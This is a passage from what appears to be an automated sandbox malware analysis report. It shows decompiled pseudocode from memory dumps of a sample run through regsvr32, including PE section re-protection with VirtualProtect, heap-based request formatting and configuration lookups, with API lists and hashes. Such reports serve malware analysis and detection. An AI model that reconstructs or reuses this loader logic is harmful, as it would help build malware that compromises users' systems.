                                                                                                                                                                                                                                    				_push(0x20);
                                                                                                                                                                                                                                    				_t23 = 1;
                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t8 = StrChrA();
                                                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t23 = _t23 + 1;
                                                                                                                                                                                                                                    					_push(0x20);
                                                                                                                                                                                                                                    					_push( &(_t8[1]));
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t12 = E023E2049(_t23 << 2);
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                                                                                                                                                                                                    				if(_t12 != 0) {
                                                                                                                                                                                                                                    					StrTrimA(_t21, 0x23ec2a4); // executed
                                                                                                                                                                                                                                    					_t26 = 0;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t24 = StrChrA(_t21, 0x20);
                                                                                                                                                                                                                                    						if(_t24 != 0) {
                                                                                                                                                                                                                                    							 *_t24 = 0;
                                                                                                                                                                                                                                    							_t24 =  &(_t24[1]);
                                                                                                                                                                                                                                    							StrTrimA(_t24, 0x23ec2a4);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                                                                                                                                                                                                    						_t26 = _t26 + 1;
                                                                                                                                                                                                                                    						_t21 = _t24;
                                                                                                                                                                                                                                    					} while (_t24 != 0);
                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,00000020,00000000,04CC95AC,?,023E23DE,?,023E7634,04CC95AC,?,023E23DE), ref: 023E94C3
                                                                                                                                                                                                                                    • StrTrimA.KERNELBASE(?,023EC2A4,00000002,?,023E23DE,?,023E7634,04CC95AC,?,023E23DE), ref: 023E94E2
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,00000020,?,023E23DE,?,023E7634,04CC95AC,?,023E23DE), ref: 023E94ED
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000001,023EC2A4,?,023E23DE,?,023E7634,04CC95AC,?,023E23DE), ref: 023E94FF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Trim
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3043112668-0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E026D111A(void* __ecx, char _a4) {
                                                                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                                                                    				int _t4;
                                                                                                                                                                                                                                    				int _t9;
                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t13 = GetCurrentThread();
                                                                                                                                                                                                                                    				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                                                                                    					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t4 = E026D163F(_a4); // executed
                                                                                                                                                                                                                                    				_t9 = _t4;
                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                    					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                    				return _t9;
                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 026D111D
                                                                                                                                                                                                                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 026D1128
                                                                                                                                                                                                                                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 026D113B
                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 026D114E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1452675757-0
                                                                                                                                                                                                                                    • Opcode ID: c8164b36dd0251698afa3c8c2eff4244212e6fd7e501e582b6111560ecf08084
                                                                                                                                                                                                                                    • Instruction ID: 41e01d316e982ff3f7bc0f273e3239df24faf71179bfcc4854edb11aceee31c4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8164b36dd0251698afa3c8c2eff4244212e6fd7e501e582b6111560ecf08084
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76E02231E022182BA3112B284C84F6F775CDFA6330B0102A5F524D23C0CBA48C228AA6
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E73FD(void* __edx) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				intOrPtr _t24;
                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t50 = __edx;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t23 = E023EA72D(0,  &_v8); // executed
                                                                                                                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t24 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    				_t4 = _t24 + 0x23eede0; // 0x4cc9388
                                                                                                                                                                                                                                    				_t5 = _t24 + 0x23eed88; // 0x4f0053
                                                                                                                                                                                                                                    				_t26 = E023E1262( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                                    				_t45 = _t26;
                                                                                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                                                                                    					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                                                                                                                    					_t45 = 8;
                                                                                                                                                                                                                                    					if(_v12 < _t45) {
                                                                                                                                                                                                                                    						_t45 = 1;
                                                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t32 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    						_t11 = _t32 + 0x23eedd4; // 0x4cc937c
                                                                                                                                                                                                                                    						_t48 = _t11;
                                                                                                                                                                                                                                    						_t12 = _t32 + 0x23eed88; // 0x4f0053
                                                                                                                                                                                                                                    						_t55 = E023E7CB8(_t11, _t12, _t11);
                                                                                                                                                                                                                                    						_t59 = _t55;
                                                                                                                                                                                                                                    						if(_t55 != 0) {
                                                                                                                                                                                                                                    							_t35 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    							_t13 = _t35 + 0x23eee1e; // 0x30314549
                                                                                                                                                                                                                                    							if(E023E89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                                                                                                                                                                                                                                    								_t61 =  *0x23ed25c - 6;
                                                                                                                                                                                                                                    								if( *0x23ed25c <= 6) {
                                                                                                                                                                                                                                    									_t42 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    									_t15 = _t42 + 0x23eec2a; // 0x52384549
                                                                                                                                                                                                                                    									E023E89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t38 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    							_t17 = _t38 + 0x23eee18; // 0x4cc93c0
                                                                                                                                                                                                                                    							_t18 = _t38 + 0x23eedf0; // 0x680043
                                                                                                                                                                                                                                    							_t45 = E023E2659(_v8, 0x80000001, _t55, _t18, _t17);
                                                                                                                                                                                                                                    							HeapFree( *0x23ed238, 0, _t55);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					HeapFree( *0x23ed238, 0, _v16);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t54 = _v8;
                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                    					E023E1F99(_t54);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t45;
                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                    0x023e750f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04CC9388,00000000,?,76D7F710,00000000,76D7F730), ref: 023E744C
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04CC93C0,?,00000000,30314549,00000014,004F0053,04CC937C), ref: 023E74E9
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,023E6814), ref: 023E74FB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: 7cf26d348235f896e8d0413c04e03651caf58cc2f8eeaf399a8dbecc01e1749a
                                                                                                                                                                                                                                    • Instruction ID: 5b292bcf45ff2d8b749c34cd8e1981b7dd0b253700401bb39d10f09b405d9f3b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cf26d348235f896e8d0413c04e03651caf58cc2f8eeaf399a8dbecc01e1749a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22317CB1E50128EEDF21ABA0DC44EAABBBDEF44314F150456E502AB1E0D3719A1DDF51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                                                                                    			E023E8504(void* __ecx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				intOrPtr _t18;
                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t32 = __ecx;
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t42 =  *0x23ed340; // 0x4cc8d39
                                                                                                                                                                                                                                    				_push(0x800);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push( *0x23ed238);
                                                                                                                                                                                                                                    				if( *0x23ed24c >= 5) {
                                                                                                                                                                                                                                    					if(RtlAllocateHeap() == 0) {
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						_t30 = 8;
                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                    						if(_t30 != 0) {
                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                    							 *0x23ed24c =  *0x23ed24c + 1;
                                                                                                                                                                                                                                    							L11:
                                                                                                                                                                                                                                    							return _t30;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t44 = _a4;
                                                                                                                                                                                                                                    						_t40 = _v8;
                                                                                                                                                                                                                                    						 *_a16 = _a4;
                                                                                                                                                                                                                                    						 *_a20 = E023E2496(_t44, _t40); // executed
                                                                                                                                                                                                                                    						_t18 = E023EA66E(_t37, _t40, _t44); // executed
                                                                                                                                                                                                                                    						if(_t18 != 0) {
                                                                                                                                                                                                                                    							 *_a8 = _t40;
                                                                                                                                                                                                                                    							 *_a12 = _t18;
                                                                                                                                                                                                                                    							if( *0x23ed24c < 5) {
                                                                                                                                                                                                                                    								 *0x23ed24c =  *0x23ed24c & 0x00000000;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t30 = 0xbf;
                                                                                                                                                                                                                                    						E023EA1B0();
                                                                                                                                                                                                                                    						RtlFreeHeap( *0x23ed238, 0, _t40); // executed
                                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t24 = E023EA279(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					_t30 = _t24;
                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(RtlAllocateHeap() == 0) {
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t24 = E023E8B94(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25); // executed
                                                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800,76D7F710), ref: 023E8528
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: GetTickCount.KERNEL32 ref: 023E8BA8
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: wsprintfA.USER32 ref: 023E8BF8
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: wsprintfA.USER32 ref: 023E8C15
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: wsprintfA.USER32 ref: 023E8C41
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: HeapFree.KERNEL32(00000000,?), ref: 023E8C53
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: wsprintfA.USER32 ref: 023E8C74
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: HeapFree.KERNEL32(00000000,?), ref: 023E8C84
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 023E8CB2
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: GetTickCount.KERNEL32 ref: 023E8CC3
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800,76D7F710), ref: 023E8546
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000002,023E685F,?,023E685F,00000002,?,?,023E2417,?), ref: 023E85A3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1676223858-0
                                                                                                                                                                                                                                    • Opcode ID: 14ad9a57e29369ffbb4d3ac98e0572c95bd9cc0f1ab58bdf380012f8a52a36c2
                                                                                                                                                                                                                                    • Instruction ID: a6d9b54d462d82fbfee791126425e0ec5a6ecd856f5885022b34f08f60d3118b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14ad9a57e29369ffbb4d3ac98e0572c95bd9cc0f1ab58bdf380012f8a52a36c2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA2171B1A50229EFCF21DF55D880F9A37ADEB48340F000416F9029B2D0DB70E919DFA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E026D1179(void* __eax, void* _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                    				int _t43;
                                                                                                                                                                                                                                    				long _t54;
                                                                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                    				_t57 =  *0x26d414c;
                                                                                                                                                                                                                                    				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                                                                                                                    				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                                                                                                                    				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                    				if(_v16 <= 0) {
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                    					_t60 = _v12;
                                                                                                                                                                                                                                    					if(_t60 != 0) {
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                    					if(_t60 >= 0) {
                                                                                                                                                                                                                                    						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                    							L8:
                                                                                                                                                                                                                                    							_t54 = _t57 - 0x63699bbf;
                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                    							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                                                                                                                                    							if(_t43 == 0) {
                                                                                                                                                                                                                                    								_v12 = GetLastError();
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_v8 = _v8 + 1;
                                                                                                                                                                                                                                    							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                                                                                                                                                                                                                    							if(_v8 < _v16) {
                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                    						_t54 = _t57 - 0x63699bc1;
                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                    					if(_t60 >= 0) {
                                                                                                                                                                                                                                    						_t54 = _t57 - 0x63699ba3;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t54 = _t57 - 0x63699b83;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                    0x026d1233
                                                                                                                                                                                                                                    0x026d1233
                                                                                                                                                                                                                                    0x026d123b
                                                                                                                                                                                                                                    0x026d123e
                                                                                                                                                                                                                                    0x026d124b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d124b
                                                                                                                                                                                                                                    0x026d1206
                                                                                                                                                                                                                                    0x026d120a
                                                                                                                                                                                                                                    0x026d1210
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1210
                                                                                                                                                                                                                                    0x026d11de
                                                                                                                                                                                                                                    0x026d11e2
                                                                                                                                                                                                                                    0x026d11ec
                                                                                                                                                                                                                                    0x026d11e4
                                                                                                                                                                                                                                    0x026d11e4
                                                                                                                                                                                                                                    0x026d11e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d11e2
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 026D11B2
                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 026D1227
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 026D122D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1469625949-0
                                                                                                                                                                                                                                    • Opcode ID: 00099efbcb56b0ba6efbeb169762142dbf61b8dd7a7263de86de018861a5064f
                                                                                                                                                                                                                                    • Instruction ID: 15be5ed43d8ee8b91498aee6f48bd5533a51e07decd870312b3f492aef95151c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00099efbcb56b0ba6efbeb169762142dbf61b8dd7a7263de86de018861a5064f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A217C31C0120AEFCB04CF95C8C1AAAF7F5FF09319F004899D00A97540E3B9A6A5CF90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                                    			E023E3DD9(void* __eflags, int _a4) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                                                    				char* _v20;
                                                                                                                                                                                                                                    				int _v24;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                                    				char _v72;
                                                                                                                                                                                                                                    				char _v76;
                                                                                                                                                                                                                                    				char _v80;
                                                                                                                                                                                                                                    				void _v84;
                                                                                                                                                                                                                                    				char _v88;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				intOrPtr _t52;
                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                                                    				WCHAR* _t85;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v88 = 0;
                                                                                                                                                                                                                                    				memset( &_v84, 0, 0x2c);
                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_t40 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    				_t5 = _t40 + 0x23eee40; // 0x410025
                                                                                                                                                                                                                                    				_t85 = E023E6A12(_t5);
                                                                                                                                                                                                                                    				_v16 = _t85;
                                                                                                                                                                                                                                    				if(_t85 == 0) {
                                                                                                                                                                                                                                    					_t80 = 8;
                                                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                                                    					return _t80;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
                                                                                                                                                                                                                                    				if(_t45 != 0) {
                                                                                                                                                                                                                                    					_t80 = 1;
                                                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                                                    					E023E9039(_v16);
                                                                                                                                                                                                                                    					goto L24;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(E023EA72D(0,  &_a4) != 0) {
                                                                                                                                                                                                                                    					_a4 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t50 = E023E809F(0,  *0x23ed33c);
                                                                                                                                                                                                                                    				_v12 = _t50;
                                                                                                                                                                                                                                    				if(_t50 == 0) {
                                                                                                                                                                                                                                    					_t80 = 8;
                                                                                                                                                                                                                                    					goto L19;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t52 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    					_t11 = _t52 + 0x23ee81a; // 0x65696c43
                                                                                                                                                                                                                                    					_t55 = E023E809F(0, _t11);
                                                                                                                                                                                                                                    					_t87 = _t55;
                                                                                                                                                                                                                                    					if(_t55 == 0) {
                                                                                                                                                                                                                                    						_t80 = 8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t80 = E023E6BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
                                                                                                                                                                                                                                    						E023E9039(_t87);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t80 != 0) {
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						E023E9039(_v12);
                                                                                                                                                                                                                                    						L19:
                                                                                                                                                                                                                                    						_t86 = _a4;
                                                                                                                                                                                                                                    						if(_a4 != 0) {
                                                                                                                                                                                                                                    							E023E1F99(_t86);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                    					} else {
